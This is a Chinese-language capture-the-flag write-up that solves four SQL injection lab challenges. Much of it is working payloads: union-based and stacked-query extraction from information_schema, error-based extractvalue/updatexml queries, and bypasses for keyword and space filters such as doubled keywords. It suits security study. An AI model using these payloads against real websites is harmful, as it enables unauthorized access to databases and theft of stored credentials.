1.[强网杯 2019]随便注1
题型同攻防世界的supersqli一致,详细过程看攻防世界_SQL注入
1.输入1
data:image/s3,"s3://crabby-images/bb249/bb2495e9b6e364e07d991fa142140500ea1f8d10" alt=""
2.测试字段数,从1开始按顺序输,到3时报错,说明字段数为2.
1' order by 1 #
3.union注入,回显了过滤的关键字。
1' union select 1,2#
4.通过show databases爆出数据库。
0'; show databases; #
5.用 show tables 尝试爆表。
0'; show tables; #
(其上是各种尝试)
6.输入1' or 1 = 1,测试一下是否存在sql注入。
提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1,说明后端参数后面有可能存在其他sql语句,我们在1' or 1 = 1后面加一个#,将可能存在的其他sql语句注释掉,即:1' or 1 = 1#,成功输出了该表的所有数据,有flag
输入1' or 1=1;# 得flag
2.[极客大挑战 2019]LoveSQL1
1.尝试用户名输入万能密码'or'1'='1'#
密码随便输入
data:image/s3,"s3://crabby-images/9aa03/9aa03acbc3fc11b62af1bb2d3c8345060bfe5873" alt=""
发现用户名admin,密码17b4d307cc8b8f2b2428e9e38c0816d3,但不是flag。
2.在用户名处输入1,1',1"判断闭合方式
输入1'时报错,说明为''
data:image/s3,"s3://crabby-images/80057/800577adae2a9a8131667ef3f0aa5e4f0c34d0bd" alt=""
data:image/s3,"s3://crabby-images/ea683/ea6838e70bea5d2d5073d9e0a334fdfad2abbccf" alt=""
3.判断字段数,从1开始按顺序输,到4时报错,说明字段数为3。
1' order by 3 #
data:image/s3,"s3://crabby-images/a8d90/a8d90091cae4878b2662bcd797ff6edde6d01820" alt=""
1' order by 4 #
data:image/s3,"s3://crabby-images/a0a84/a0a848ca9185cfc4e53fa28ab9729044912d32fc" alt=""
4.查看回显
用户输入1' union select 1,2,3 #
密码随意值
data:image/s3,"s3://crabby-images/73b15/73b159efedfa6d3ddf075215d7861c15a3a2cc13" alt=""
5.查看库名:
1' union select 1,2,database() #
data:image/s3,"s3://crabby-images/34e3b/34e3bd5ccaaf1f8bb7c4486ce9067210dea804a1" alt=""
6.查找表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) #
data:image/s3,"s3://crabby-images/84035/84035b4e226c52fca51bff0c6e88a90496901103" alt=""
7.查找列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') #
data:image/s3,"s3://crabby-images/b4288/b428866edf3ca562be4238a7fbd277fc3150937e" alt=""
8.得flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) #
data:image/s3,"s3://crabby-images/442f2/442f28991eb157b2569d958fdfd88998f5da3c15" alt=""
查看页面源代码,复制flag。
(或者按F12,在URL处输入,其中#改为%23)
3.[极客大挑战 2019]HardSQL
1.尝试一下万能密码,不能用
双写再试一下发现也不行
2.(1)特殊字符测试:尝试输入一些SQL关键字(如 SELECT 、 INSERT 、 UPDATE 、 DELETE )、特殊符号(单引号 ' 、双引号 " 、分号 ; 、注释符号 -- 或 /* */ )。如果输入这些内容后,系统没有按照预期返回结果(如正常应该返回数据,但却返回错误提示或空结果),或者页面显示不正常,那么很可能这些字符被过滤了。
(2)使用Burp查看被过滤字符。
发现select、ascii、空格、=等被过滤
再加上之前页面的报错
就确定了需要用报错注入来做
随后构造注入语句
因为"="、"空格"被过滤了
所以就用常用的" like "和" () "来绕过
3.查找数据表名
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))))#
或
1'^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#
data:image/s3,"s3://crabby-images/3d06a/3d06a69a5ee2f2051d1a896af56a345ca7fbe7c5" alt=""
4.查找列名
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#
或
1'^(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))#
data:image/s3,"s3://crabby-images/5d540/5d5408710d9d3572a8689b52b1039b2a13445277" alt=""
5.查看内容
1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))#
data:image/s3,"s3://crabby-images/e590b/e590ba038f7ec16213054d89d57cb05b18412564" alt=""
输入后会发现他只给了你前半段的flag
因为extractvalue函数限制了一次字符串只能输出32位。
只需要使用left和right函数即可,{left(),right()}
最终语句为
1'^extractvalue(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))))#
或
1'^(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))),1))#
data:image/s3,"s3://crabby-images/86ea5/86ea5c632386d196a4279043894c8c2b51ba6353" alt=""
拼接输入flag,发现不对,猜测中间还有
将30改为32
data:image/s3,"s3://crabby-images/a30f4/a30f4f466c10a2970d3d14f7817c0f1aa965a0b7" alt=""
尝试改35,发现与flag的前一部分相同。
data:image/s3,"s3://crabby-images/5e51a/5e51a6e2287b49d2fae6b89093ec389c54ef4a34" alt=""
(我之前是直接拼接,没有去掉中间相同的部分。)
找flag的前后衔接处,拼接
最终得flag{8fdce764-338d-4a9c-9a02-17c9ce971b23}
4.[极客大挑战 2019]BabySQL
1.判断闭合方式
可在用户名处注入,也可在密码处注入。前者
用户名输入1,密码任意值,正常回显页面。
data:image/s3,"s3://crabby-images/1594b/1594b4a1a97adabd7a5044247141e511f6ff014f" alt=""
用户名输入1'密码任意值,报错。
2.尝试万能密码,报错,说明and or都有可能被过滤。
例:an(and)d,括号不用加)
输入1' oorr 1=1 #
data:image/s3,"s3://crabby-images/31f1e/31f1eb4dd2d03f5e2029e4ec663251cfa3b7e2e0" alt=""
3.判断字段数
data:image/s3,"s3://crabby-images/4e83c/4e83c5f2f90e1100da33959f018e484e812db3c9" alt=""
order 变成了der,or被吞了,by被吞了,双写绕过
data:image/s3,"s3://crabby-images/ceb32/ceb325510e01495b8ff2209a4184057163acc29e" alt=""
data:image/s3,"s3://crabby-images/35a2b/35a2b758903fd0ab63251d452caad697c188902b" alt=""
字段为3。
4.查找数据库名
1' union select database(),1,2 #报错,可能是union或者select中一个或者都是
经过尝试发现在union和select都双写后成功注入。
1' ununionion seselectlect database(),1,2 #
1' ununionion seselectlect 1,database(),2 #
1' ununionion seselectlect 1,2,database() #
data:image/s3,"s3://crabby-images/2253c/2253c06e659eb78c5604335344d74c37bc13dc7f" alt=""
data:image/s3,"s3://crabby-images/7c54d/7c54d31509aa8f659f9ad140a5c462bb80935bf1" alt=""
发现一号位不是回显点,二三号位都是回显点。
5.查找数据表名
查询"geek"库下的表:
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
data:image/s3,"s3://crabby-images/65290/652903fe34e74d1fac9b8f9213bd0bda723ca9f9" alt=""
6.查找列名
这两个表:'b4bsql,geekuser',题目名叫baby SQL,猜测要找到flag在"b4bsql"中,所以查询b4bsql:
1' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
data:image/s3,"s3://crabby-images/e6939/e6939328680e39cb9053a53613b61af752f0732b" alt=""
7.查询username,password中的内容
1' ununionion seselectlect 1,2,group_concat(username ,id , passwoorrd) frfromom b4bsql#
data:image/s3,"s3://crabby-images/eaac4/eaac4e49d9b06b014ec3319e2eb46c996f4a8e55" alt=""
得flag。